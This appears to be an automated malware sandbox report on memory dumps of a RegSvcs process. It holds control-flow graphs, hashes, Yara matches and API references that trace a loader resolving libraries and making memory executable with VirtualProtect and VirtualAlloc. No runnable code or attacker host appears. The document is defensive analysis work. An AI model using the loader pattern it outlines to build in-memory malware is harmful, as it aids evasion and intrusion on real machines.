                            Memory Dump Source
                            • Source File: 0000000D.00000002.3417271987.00000000031CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031CD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_31cd000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 639fa42f9fc308d699d9fa118584c66b6ce5c57d6c76ec3b952cb6392f221111
                            • Instruction ID: 90e7074e1f60037193c7c36e6e9d76feb762b1b94606cd5459a465bf9e3f0471
                            • Opcode Fuzzy Hash: 639fa42f9fc308d699d9fa118584c66b6ce5c57d6c76ec3b952cb6392f221111
                            • Instruction Fuzzy Hash: 5F01D4310053809BD720CA19DC84B67BF98EF59320F28C47EED480A246C3799842CAB1

                            Execution Graph

                            Execution Coverage:16.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:90
                            Total number of Limit Nodes:5
                            execution_graph 3596 b81b16 3597 b81b3a 3596->3597 3598 b81c24 3596->3598 3634 b84397 3597->3634 3608 b82df0 3598->3608 3601 b81b52 3602 b84397 LoadLibraryA 3601->3602 3607 b81bca 3601->3607 3603 b81b94 3602->3603 3604 b84397 LoadLibraryA 3603->3604 3605 b81bb0 3604->3605 3606 b84397 LoadLibraryA 3605->3606 3606->3607 3609 b84397 LoadLibraryA 3608->3609 3610 b82e13 3609->3610 3611 b84397 LoadLibraryA 3610->3611 3612 b82e2b 3611->3612 3613 b84397 LoadLibraryA 3612->3613 3614 b82e49 3613->3614 3615 b82e5e VirtualAlloc 3614->3615 3633 b82e72 3614->3633 3617 b82e8c 3615->3617 3615->3633 3616 b84397 LoadLibraryA 3618 b82f0a 3616->3618 3617->3616 3617->3633 3620 b82f60 3618->3620 3618->3633 3638 b8419e 3618->3638 3619 b84397 LoadLibraryA 3619->3620 3620->3619 3623 b82fc2 3620->3623 3620->3633 3622 b83024 3624 b8303f VirtualAlloc 3622->3624 3631 b83067 3622->3631 3622->3633 3623->3622 3623->3633 3642 b81f80 3623->3642 3624->3631 3624->3633 3626 b83130 3671 b83520 3626->3671 3628 b830e5 3628->3633 3665 b82be1 3628->3665 3631->3626 3631->3628 3631->3633 3633->3607 3635 b843ae 3634->3635 3636 b843d5 3635->3636 3695 b8249c 3635->3695 3636->3601 3639 b841b3 3638->3639 3640 b84229 LoadLibraryA 3639->3640 3641 b84233 3639->3641 3640->3641 3641->3618 3643 b8419e LoadLibraryA 3642->3643 3644 b81f94 3643->3644 3647 b81f9c 3644->3647 3681 b8423c 3644->3681 3647->3633 3656 b8207b 3647->3656 3648 b81fd2 VirtualProtect 3648->3647 3649 b81fe6 3648->3649 3650 b82000 VirtualProtect 3649->3650 3651 b8423c LoadLibraryA 3650->3651 3652 b82021 3651->3652 3652->3647 3653 b82038 VirtualProtect 3652->3653 3653->3647 3654 b82048 3653->3654 3655 b8205d VirtualProtect 3654->3655 3655->3647 3657 b8419e LoadLibraryA 3656->3657 3658 b82091 3657->3658 3659 b8423c LoadLibraryA 3658->3659 3660 b820a1 3659->3660 3661 b820aa VirtualProtect 3660->3661 3662 b820de 3660->3662 3661->3662 3663 b820ba 3661->3663 3662->3622 3664 b820c9 VirtualProtect 3663->3664 3664->3662 3667 b82c14 3665->3667 3666 b82cbf 3666->3633 3667->3666 3668 b82d06 SysAllocString 3667->3668 3669 b82cee 3667->3669 3668->3669 3669->3666 3670 b82dda SafeArrayDestroy 3669->3670 3670->3666 3675 b8355b 3671->3675 3672 b8419e LoadLibraryA 3672->3675 3673 b8419e LoadLibraryA 3674 b83903 3673->3674 3674->3673 3677 b8423c LoadLibraryA 3674->3677 3678 b839a1 3674->3678 3675->3672 3675->3674 3676 b8423c LoadLibraryA 3675->3676 3680 b83bcf 3675->3680 3676->3675 3677->3674 3678->3680 3691 b83f51 3678->3691 3680->3633 3682 b84257 3681->3682 3684 b81fb4 3681->3684 3682->3684 3685 b82641 3682->3685 3684->3647 3684->3648 3687 b82660 3685->3687 3690 b82686 3685->3690 3686 b8419e LoadLibraryA 3688 b82693 3686->3688 3687->3688 3689 b8423c LoadLibraryA 3687->3689 3687->3690 3688->3684 3689->3687 3690->3686 3690->3688 3694 b83f79 3691->3694 3692 b8416b 3692->3680 3693 b8423c LoadLibraryA 3693->3694 3694->3692 3694->3693 3697 b824bc 3695->3697 3698 b825a1 3695->3698 3696 b82641 LoadLibraryA 3696->3698 3697->3696 3697->3698 3698->3635

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00B8419E: LoadLibraryA.KERNELBASE(00000000,?,?), ref: 00B84230
                            • VirtualProtect.KERNELBASE(00000000,0000000C,00000040,?), ref: 00B81FDB
                            • VirtualProtect.KERNELBASE(00000000,0000000C,?,?), ref: 00B8200E
                            • VirtualProtect.KERNELBASE(00000000,0040145E,00000040,?), ref: 00B82041
                            • VirtualProtect.KERNELBASE(00000000,0040145E,?,?), ref: 00B8206B
                            Memory Dump Source
                            • Source File: 00000016.00000002.3383370741.0000000000B70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_b70000_RegSvcs.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProtectVirtual$LibraryLoad
                            • String ID:
                            • API String ID: 895956442-0
                            • Opcode ID: 93985e93d1afab8f719b8aa13ce6a91e230957808ceab0eaee363415b4ddc148
                            • Instruction ID: d1efd771295cade43d580548f1c70c40e4c047b215868614db2fdcd46ac81c14
                            • Opcode Fuzzy Hash: 93985e93d1afab8f719b8aa13ce6a91e230957808ceab0eaee363415b4ddc148
                            • Instruction Fuzzy Hash: 9721A77260420A7EE320BBA19C85FB77BDCDB45300F44487EFA46D1171EB6AA905C3B5

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 26 b8419e-b841b1 27 b841c9-b841d3 26->27 28 b841b3-b841b6 26->28 30 b841e2-b841ee 27->30 31 b841d5-b841dd 27->31 29 b841b8-b841bb 28->29 29->27 32 b841bd-b841c7 29->32 33 b841f1-b841f6 30->33 31->30 32->27 32->29 34 b841f8-b84203 33->34 35 b84229-b84230 LoadLibraryA 33->35 36 b8421f-b84223 34->36 37 b84205-b8421d call b8486c 34->37 38 b84233-b84237 35->38 36->33 40 b84225-b84227 36->40 37->36 42 b84238-b8423a 37->42 40->35 40->38 42->38
                            APIs
                            • LoadLibraryA.KERNELBASE(00000000,?,?), ref: 00B84230
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.3383370741.0000000000B70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_b70000_RegSvcs.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID: .$.dll
                            • API String ID: 1029625771-979041800
                            • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                            • Instruction ID: e223fd2e86eb2fba302ddc0990a926610b4489f5ad036cb31e0705f0c547afa9
                            • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                            • Instruction Fuzzy Hash: BF210635604296CFD721EFA9D848A6EBBE4FF15324F1941EDE8019BA61D730EC45C740

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 43 51b0460-51b0497 1158 51b0499 call 51b3821 43->1158 1159 51b0499 call 51b3830 43->1159 47 51b049f-51b09ad 158 51b09b8-51b3818 47->158 1158->47 1159->47
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: Te]q
                            • API String ID: 0-52440209
                            • Opcode ID: ebfd2e9c08323d7fc541b25514e00d49ba53d54317a3aacb4a6ade642abfdcf1
                            • Instruction ID: 1c191b5f7b46e5698b5e478a6d46001d0aec8b257860fbafc232c316fceebc55
                            • Opcode Fuzzy Hash: ebfd2e9c08323d7fc541b25514e00d49ba53d54317a3aacb4a6ade642abfdcf1
                            • Instruction Fuzzy Hash: 01937E38260A01CFC758EF28E998D057BB9FF49B1431295A9E5568BB7ADB31EC05CF40

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1160 51b4240-51b4244 1161 51b425d-51b425e 1160->1161 1162 51b4246-51b4248 1160->1162 1164 51b4261-51b426f 1161->1164 1163 51b424a-51b425b 1162->1163 1162->1164 1163->1161 1165 51b4531-51b458b 1164->1165 1166 51b4275-51b42e9 1164->1166 1173 51b45b6-51b45bf 1165->1173 1191 51b42ef-51b4374 1166->1191 1174 51b458d-51b4596 1173->1174 1175 51b45c1-51b45c7 1173->1175 1177 51b45ca-51b45d8 1174->1177 1178 51b4598-51b45a6 1174->1178 1185 51b45da-51b45f4 1177->1185 1186 51b45f5-51b46af call 51b46d0 1177->1186 1178->1177 1180 51b45a8-51b45ac 1178->1180 1181 51b45ae-51b45b0 1180->1181 1182 51b45b3 1180->1182 1181->1182 1182->1173 1185->1186 1223 51b46b5-51b46cd 1186->1223 1209 51b438b-51b43a4 1191->1209 1210 51b4376-51b4389 1191->1210 1212 51b43ab-51b43af 1209->1212 1210->1212 1213 51b43ba 1212->1213 1214 51b43b1 1212->1214 1213->1165 1214->1213
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: (aq$Te]q$d6p
                            • API String ID: 0-967301506
                            • Opcode ID: 756e777501da6bedbc1233d7f58a5c52842ac3b841679c0784b97edabac68cf3
                            • Instruction ID: eef86edb0aeca61d3ea232d7f3c3f7a62fe056c0661ba191df94942c288ca540
                            • Opcode Fuzzy Hash: 756e777501da6bedbc1233d7f58a5c52842ac3b841679c0784b97edabac68cf3
                            • Instruction Fuzzy Hash: B951B335B101148FCB58DF68D458AADBBF6BF89710B1581AAE806DB366CB71DD01CB90

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1226 b82be1-b82c0e 1227 b82c14-b82c27 1226->1227 1228 b82c96-b82c9d 1226->1228 1234 b82cca-b82ccd 1227->1234 1235 b82c2d-b82c59 call b84179 1227->1235 1229 b82cbb-b82cbd 1228->1229 1230 b82c9f-b82cb3 1228->1230 1231 b82ccf-b82cda 1229->1231 1232 b82cbf-b82cc5 1229->1232 1230->1229 1240 b82ce0-b82cec 1231->1240 1241 b82de1 1231->1241 1236 b82de5-b82def 1232->1236 1234->1230 1246 b82c5b-b82c6a 1235->1246 1247 b82c8f 1235->1247 1242 b82cfa-b82d22 call b84179 SysAllocString 1240->1242 1243 b82cee-b82cf8 1240->1243 1241->1236 1254 b82d26-b82d35 1242->1254 1250 b82d38-b82d3a 1243->1250 1246->1230 1255 b82c6c-b82c71 1246->1255 1251 b82c92-b82c94 1247->1251 1250->1241 1252 b82d40-b82d54 1250->1252 1251->1228 1251->1230 1252->1241 1259 b82d5a-b82d7c 1252->1259 1254->1250 1255->1251 1258 b82c73-b82c89 1255->1258 1260 b82c8d 1258->1260 1259->1241 1262 b82d7e-b82d89 1259->1262 1260->1251 1263 b82d8b-b82d9c 1262->1263 1264 b82d9e-b82da7 1262->1264 1263->1263 1263->1264 1268 b82da9 call 10fd01d 1264->1268 1269 b82da9 call 10fd01c 1264->1269 1265 b82daf-b82dc5 1266 b82dda-b82ddb SafeArrayDestroy 1265->1266 1267 b82dc7-b82dd8 1265->1267 1266->1241 1267->1266 1267->1267 1268->1265 1269->1265
                            APIs
                            • SysAllocString.OLEAUT32(?), ref: 00B82D0E
                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 00B82DDB
                            Memory Dump Source
                            • Source File: 00000016.00000002.3383370741.0000000000B70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_b70000_RegSvcs.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocArrayDestroySafeString
                            • String ID:
                            • API String ID: 2679478824-0
                            • Opcode ID: e9dae07e6597974dd7a2e07dc59b16717cc00198222b0edab0e98d7cec828a5a
                            • Instruction ID: 86b199eb419ccab651a946475c0ed8e5ba7c47fa4982039fb3dc68f68f18e3f4
                            • Opcode Fuzzy Hash: e9dae07e6597974dd7a2e07dc59b16717cc00198222b0edab0e98d7cec828a5a
                            • Instruction Fuzzy Hash: 6C613C71200206AFDB24EF60C884FABBBE8FF49315F1485A9E959CB155DB30E945CFA1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1270 b8207b-b820a8 call b8419e call b8423c 1275 b820aa-b820b8 VirtualProtect 1270->1275 1276 b820de 1270->1276 1275->1276 1278 b820ba-b820dc call b8480c VirtualProtect 1275->1278 1277 b820e0-b820e3 1276->1277 1278->1277
                            APIs
                              • Part of subcall function 00B8419E: LoadLibraryA.KERNELBASE(00000000,?,?), ref: 00B84230
                            • VirtualProtect.KERNELBASE(00000000,00000004,00000040,?), ref: 00B820B3
                            • VirtualProtect.KERNELBASE(00000000,00000004,?,?), ref: 00B820D6
                            Memory Dump Source
                            • Source File: 00000016.00000002.3383370741.0000000000B70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_b70000_RegSvcs.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProtectVirtual$LibraryLoad
                            • String ID:
                            • API String ID: 895956442-0
                            • Opcode ID: 4b81b02862df4f1b90606a87d7a95fef9c5f7f2dde159036914d36a532f09deb
                            • Instruction ID: b9df66874339867c1f4f03b1d73cbeb20690bbf8cfa196aff757c0222fc5b1f4
                            • Opcode Fuzzy Hash: 4b81b02862df4f1b90606a87d7a95fef9c5f7f2dde159036914d36a532f09deb
                            • Instruction Fuzzy Hash: 4BF08CB61106087AE610ABA4CC42FFB77ECDB49B50F400468FB06E6090EBB5AA45C7A5

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1281 b82df0-b82e54 call b84397 * 3 1288 b82e7e 1281->1288 1289 b82e56-b82e58 1281->1289 1290 b82e81-b82e8b 1288->1290 1289->1288 1291 b82e5a-b82e5c 1289->1291 1291->1288 1292 b82e5e-b82e70 VirtualAlloc 1291->1292 1293 b82e8c-b82eaf call b8480c call b84830 1292->1293 1294 b82e72-b82e79 1292->1294 1300 b82ef9-b82f12 call b84397 1293->1300 1301 b82eb1-b82ee7 call b84504 call b843da 1293->1301 1294->1288 1295 b82e7b 1294->1295 1295->1288 1300->1288 1306 b82f18 1300->1306 1312 b83148-b83151 1301->1312 1313 b82eed-b82ef3 1301->1313 1308 b82f1e-b82f24 1306->1308 1310 b82f60-b82f69 1308->1310 1311 b82f26-b82f2c 1308->1311 1317 b82f6b-b82f71 1310->1317 1318 b82fc2-b82fcd 1310->1318 1314 b82f2e-b82f31 1311->1314 1315 b83158-b83160 1312->1315 1316 b83153-b83156 1312->1316 1313->1300 1313->1312 1321 b82f33-b82f38 1314->1321 1322 b82f45-b82f47 1314->1322 1323 b8318f 1315->1323 1324 b83162-b8318d call b84830 1315->1324 1316->1315 1316->1323 1325 b82f75-b82f90 call b84397 1317->1325 1319 b82fcf-b82fd8 call b820e4 1318->1319 1320 b82fe6-b82fe9 1318->1320 1331 b83144 1319->1331 1344 b82fde-b82fe4 1319->1344 1330 b82fef-b82ff8 1320->1330 1320->1331 1321->1322 1328 b82f3a-b82f43 1321->1328 1322->1310 1329 b82f49-b82f57 call b8419e 1322->1329 1326 b83193-b831b3 call b84830 1323->1326 1324->1326 1341 b82faf-b82fc0 1325->1341 1342 b82f92-b82f9a 1325->1342 1363 b831b9-b831bb 1326->1363 1364 b831b5 1326->1364 1328->1314 1328->1322 1345 b82f5c-b82f5e 1329->1345 1339 b82ffa 1330->1339 1340 b82ffe-b83005 1330->1340 1331->1312 1339->1340 1346 b83035-b83039 1340->1346 1347 b83007-b83010 call b81f80 1340->1347 1341->1318 1341->1325 1342->1331 1349 b82fa0-b82fa9 1342->1349 1344->1340 1345->1308 1350 b830db-b830de 1346->1350 1351 b8303f-b83061 VirtualAlloc 1346->1351 1358 b8301e-b8301f call b8207b 1347->1358 1359 b83012-b83018 1347->1359 1349->1331 1349->1341 1353 b83130-b83132 call b83520 1350->1353 1354 b830e0-b830e3 1350->1354 1351->1331 1355 b83067-b8307a call b8480c 1351->1355 1368 b83137-b83138 1353->1368 1354->1353 1360 b830e5-b830e8 1354->1360 1373 b8307c-b83080 1355->1373 1374 b8309e-b830d7 1355->1374 1370 b83024-b83027 1358->1370 1359->1331 1359->1358 1366 b830ea-b830ec 1360->1366 1367 b83101-b83112 call b82be1 1360->1367 1363->1290 1364->1363 1366->1367 1371 b830ee-b830f1 1366->1371 1385 b83123-b8312e call b826ad 1367->1385 1386 b83114-b8311b call b831c0 1367->1386 1372 b83139-b83140 1368->1372 1370->1346 1376 b83029-b8302f 1370->1376 1377 b830f8-b830ff call b83d8e 1371->1377 1378 b830f3-b830f6 1371->1378 1372->1331 1379 b83142 1372->1379 1373->1374 1380 b83082-b83085 1373->1380 1374->1331 1388 b830d9 1374->1388 1376->1331 1376->1346 1377->1368 1378->1372 1378->1377 1379->1379 1380->1350 1384 b83087-b8309c call b8460f 1380->1384 1384->1388 1385->1368 1392 b83120 1386->1392 1388->1350 1392->1385
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B82E6A
                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00B83059
                            Memory Dump Source
                            • Source File: 00000016.00000002.3383370741.0000000000B70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_b70000_RegSvcs.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 1a5418cea19d400be9e889379b85ba4036e89269bda122047750eba29fcf4b87
                            • Instruction ID: d7387fd9337c5be508617f957c73a2b0b53d5a3ecaf3c3b929a160329e361bce
                            • Opcode Fuzzy Hash: 1a5418cea19d400be9e889379b85ba4036e89269bda122047750eba29fcf4b87
                            • Instruction Fuzzy Hash: 39B1C131500706ABDB21BF60CC84BABF7E9FF05F00F1405A9F999A6161E731EA51DBA1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1395 51b40a8-51b40c8 1397 51b40ca-51b40d4 1395->1397 1398 51b40d6 1395->1398 1399 51b40db-51b40dd 1397->1399 1398->1399 1400 51b40e3-51b4134 1399->1400 1401 51b41d2-51b4224 call 51b4240 1399->1401 1410 51b4140-51b4189 1400->1410 1411 51b4136-51b413a 1400->1411 1414 51b422a-51b423a 1401->1414 1419 51b418f-51b41b3 1410->1419 1411->1410 1422 51b41be-51b41bf 1419->1422 1423 51b41b5 1419->1423 1422->1401 1423->1422
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: Haq$dLcq
                            • API String ID: 0-1713614415
                            • Opcode ID: fae64df6d581245cdda7d4255391d0fb411f347c151449e83ad70a07d4f12943
                            • Instruction ID: 6859f72fafcfe94b790a4266b00db329976f1087f6ba1aeb595599c40edede43
                            • Opcode Fuzzy Hash: fae64df6d581245cdda7d4255391d0fb411f347c151449e83ad70a07d4f12943
                            • Instruction Fuzzy Hash: 7D41E130B042149FCB19DF69D494AAEBFF6BF88200F1585AAE446DB362CB75DC04CB90

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1426 51b3830-51b3843 1428 51b384b-51b384e 1426->1428 1429 51b3845-51b3847 1426->1429 1430 51b387b-51b3895 1428->1430 1432 51b3850-51b386f 1428->1432 1429->1430 1431 51b3849 1429->1431 1437 51b38ad-51b39c2 1430->1437 1438 51b3897-51b38ab 1430->1438 1431->1432 1470 51b3871 call 51b3888 1432->1470 1471 51b3871 call 51b3821 1432->1471 1472 51b3871 call 51b3830 1432->1472 1459 51b39ca-51b39cd 1437->1459 1460 51b39c4-51b39c6 1437->1460 1438->1437 1439 51b3877-51b387a 1462 51b3a07 1459->1462 1463 51b39cf-51b3a05 1459->1463 1461 51b39c8 1460->1461 1460->1462 1461->1463 1465 51b3a0c-51b3a10 1462->1465 1463->1465 1466 51b3a1b 1465->1466 1467 51b3a12 1465->1467 1469 51b3a1c 1466->1469 1467->1466 1469->1469 1470->1439 1471->1439 1472->1439
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: Te]q
                            • API String ID: 0-52440209
                            • Opcode ID: b08d86dcf9a8fbcb5b6232118b275f59e7d9548768a1bff572ed68117588db95
                            • Instruction ID: 4d30c5e18680977561296503d5135bb2d93b673c496eb680ca4e8ae60449a93e
                            • Opcode Fuzzy Hash: b08d86dcf9a8fbcb5b6232118b275f59e7d9548768a1bff572ed68117588db95
                            • Instruction Fuzzy Hash: DF615A34B001148FDB58DF69C498AADBBF2BF89720B2585AAE516DB3B1CB71DC05CB40

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1473 51b3888-51b3895 1475 51b38ad-51b39c2 1473->1475 1476 51b3897-51b38ab 1473->1476 1496 51b39ca-51b39cd 1475->1496 1497 51b39c4-51b39c6 1475->1497 1476->1475 1499 51b3a07 1496->1499 1500 51b39cf-51b3a05 1496->1500 1498 51b39c8 1497->1498 1497->1499 1498->1500 1502 51b3a0c-51b3a10 1499->1502 1500->1502 1503 51b3a1b 1502->1503 1504 51b3a12 1502->1504 1506 51b3a1c 1503->1506 1504->1503 1506->1506
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: Te]q
                            • API String ID: 0-52440209
                            • Opcode ID: ac3f08e4fdb88d95b1d9e24ae57c061a05979a12d618fc2d038b7a71ea425c99
                            • Instruction ID: 7e8b48c7ce667b526cf79df7ae7e04461e1cf090f09581474cf5432b1b21e284
                            • Opcode Fuzzy Hash: ac3f08e4fdb88d95b1d9e24ae57c061a05979a12d618fc2d038b7a71ea425c99
                            • Instruction Fuzzy Hash: 76511474B001148FDB58DF69C598AADBBF2BF88B10B2584A9E916DB3B5CB71DC05CB40

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1507 51b46d0-51b46fc 1509 51b4703-51b4737 1507->1509 1514 51b4739-51b473b 1509->1514 1515 51b473d 1509->1515 1516 51b4740-51b4758 1514->1516 1515->1516 1518 51b479b-51b47d9 1516->1518 1519 51b475a 1516->1519 1520 51b475d-51b4799 1519->1520 1520->1518
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: LR]q
                            • API String ID: 0-3081347316
                            • Opcode ID: a69b0c1691cd9d433d684c4c1f3588b008048d1c3341757cbd9df4938af8d011
                            • Instruction ID: 14fbc45fcc5a3e53c9f691ce799733b5414f0c514ed5c9aeb055505d630f25d9
                            • Opcode Fuzzy Hash: a69b0c1691cd9d433d684c4c1f3588b008048d1c3341757cbd9df4938af8d011
                            • Instruction Fuzzy Hash: F531AF70B001169FCB44EB78C455A6EBBF6FF89214F148469E14ADB355DA70DC06CB91

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1529 51b4097-51b40a5 1530 51b40bd-51b40c8 1529->1530 1531 51b40a7-51b40bb 1529->1531 1532 51b40ca-51b40d4 1530->1532 1533 51b40d6 1530->1533 1531->1530 1534 51b40db-51b40dd 1532->1534 1533->1534 1535 51b40e3-51b4134 1534->1535 1536 51b41d2-51b4224 call 51b4240 1534->1536 1545 51b4140-51b4189 1535->1545 1546 51b4136-51b413a 1535->1546 1549 51b422a-51b423a 1536->1549 1554 51b418f-51b41b3 1545->1554 1546->1545 1557 51b41be-51b41bf 1554->1557 1558 51b41b5 1554->1558 1557->1536 1558->1557
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: dLcq
                            • API String ID: 0-2236789282
                            • Opcode ID: 1ac0d096c43692132db7f5d36e4fb327c794ff8a958f8273ed05713f1d0224b6
                            • Instruction ID: 533ccd8a1b2f3b045f9604229138eaa1b9b4f5444cc50822e08ddfb2bdf707fc
                            • Opcode Fuzzy Hash: 1ac0d096c43692132db7f5d36e4fb327c794ff8a958f8273ed05713f1d0224b6
                            • Instruction Fuzzy Hash: 23316E34A042159FDB18DF68D498AEDBFF6FF48300F1585AAE411AB366CBB19D44CB50

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1561 51b41d1-51b4224 call 51b4240 1568 51b422a-51b423a 1561->1568
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: Haq
                            • API String ID: 0-725504367
                            • Opcode ID: 324d6eb4d92a0e298030ff14d833f8c37fe35d48b9dcd806a0c5e57901049659
                            • Instruction ID: aaafea5829ec68b46eeaab477c9679cab768f0582ea73c1390a72af5a7a15fef
                            • Opcode Fuzzy Hash: 324d6eb4d92a0e298030ff14d833f8c37fe35d48b9dcd806a0c5e57901049659
                            • Instruction Fuzzy Hash: 52F046313082800FC30A9739981056EBFE7AFC611431A49FBE089C7392CD248C068391

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1642 51b3e09-51b3e10 1643 51b3e12-51b3e14 1642->1643 1644 51b3e25-51b3e68 1642->1644 1645 51b3e89 1643->1645 1646 51b3e16-51b3e24 1643->1646 1688 51b3e6a call 51b40a8 1644->1688 1689 51b3e6a call 51b4097 1644->1689 1720 51b3e89 call 51b40a8 1645->1720 1721 51b3e89 call 51b41d1 1645->1721 1722 51b3e89 call 51b4097 1645->1722 1646->1644 1648 51b3e8f-51b3ea6 1725 51b3ea8 call 51b40a8 1648->1725 1726 51b3ea8 call 51b41d1 1648->1726 1727 51b3ea8 call 51b4097 1648->1727 1652 51b3eae-51b3ec5 1685 51b3ec7 call 51b40a8 1652->1685 1686 51b3ec7 call 51b41d1 1652->1686 1687 51b3ec7 call 51b4097 1652->1687 1656 51b3ecd-51b3ee4 1690 51b3ee6 call 51b40a8 1656->1690 1691 51b3ee6 call 51b41d1 1656->1691 1692 51b3ee6 call 51b4097 1656->1692 1657 51b3e70-51b3e87 1657->1645 1660 51b3eec-51b3f03 1693 51b3f05 call 51b40a8 1660->1693 1694 51b3f05 call 51b41d1 1660->1694 1695 51b3f05 call 51b4097 1660->1695 1662 51b3f0b-51b3f22 1696 51b3f24 call 51b40a8 1662->1696 1697 51b3f24 call 51b41d1 1662->1697 1698 51b3f24 call 51b4097 1662->1698 1664 51b3f2a-51b3f41 1699 51b3f43 call 51b40a8 1664->1699 1700 51b3f43 call 51b41d1 1664->1700 1701 51b3f43 call 51b4097 1664->1701 1666 51b3f49-51b3f60 1702 51b3f62 call 51b40a8 1666->1702 1703 51b3f62 call 51b41d1 1666->1703 1704 51b3f62 call 51b4097 1666->1704 1668 51b3f68-51b3f7f 1705 51b3f81 call 51b40a8 1668->1705 1706 51b3f81 call 51b41d1 1668->1706 1707 51b3f81 call 51b4097 1668->1707 1670 51b3f87-51b3f9e 1708 51b3fa0 call 51b40a8 1670->1708 1709 51b3fa0 call 51b41d1 1670->1709 1710 51b3fa0 call 51b4097 1670->1710 1672 51b3fa6-51b3fb1 1711 51b3fb1 call 51b4568 1672->1711 1712 51b3fb1 call 51b4530 1672->1712 1713 51b3fb1 call 51b4240 1672->1713 1674 51b3fb7-51b3fce 1714 51b3fd0 call 51b40a8 1674->1714 1715 51b3fd0 call 51b41d1 1674->1715 1716 51b3fd0 call 51b4097 1674->1716 1676 51b3fd6-51b3ff9 1717 51b3ffb call 51b40a8 1676->1717 1718 51b3ffb call 51b41d1 1676->1718 1719 51b3ffb call 51b4097 1676->1719 1679 51b4001-51b401c 1723 51b401c call 51b47e1 1679->1723 1724 51b401c call 51b47f0 